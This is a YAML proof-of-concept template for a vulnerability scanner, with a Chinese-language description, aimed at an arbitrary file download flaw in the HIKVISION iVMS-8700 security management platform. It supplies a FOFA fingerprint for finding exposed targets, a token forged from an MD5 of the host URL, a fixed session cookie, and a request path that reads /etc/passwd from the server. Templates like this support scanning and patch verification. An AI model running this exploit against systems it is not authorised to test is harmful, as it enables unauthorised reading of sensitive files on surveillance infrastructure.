id: hikvision-ivms-8700-anyfile-download

info:
  name: HIKVISION iVMS-8700综合安防管理平台 download 任意文件下载
  author: peiqi
  severity: high
  verified: true
  description: |
    HIKVISION iVMS-8700综合安防管理平台存在任意文件读取漏洞，攻击者通过发送特定的请求包可以读取服务器中的敏感文件获取服务器信息
    FOFA: icon_hash="-911494769"
  solutions: HIKVISION iVMS-8700综合安防管理平台
  reference:
    - https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HIKVISION%20iVMS-8700%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20download%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.html
  tags: hikvision,ivms8700,download
  created: 2023/06/25

set:
  token: toUpper(md5(request.url.scheme+"://"+request.url.host+"/eps/api/resourceOperations/uploadsecretKeyIbuilding"))
rules:
  r0:
    request:
      method: GET
      headers:
        Cookie: ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169
      path: /eps/api/triggerSnapshot/download?token={{token}}&fileUrl=file:///etc/passwd&fileName=1
    expression: response.status == 200
expression: r0()
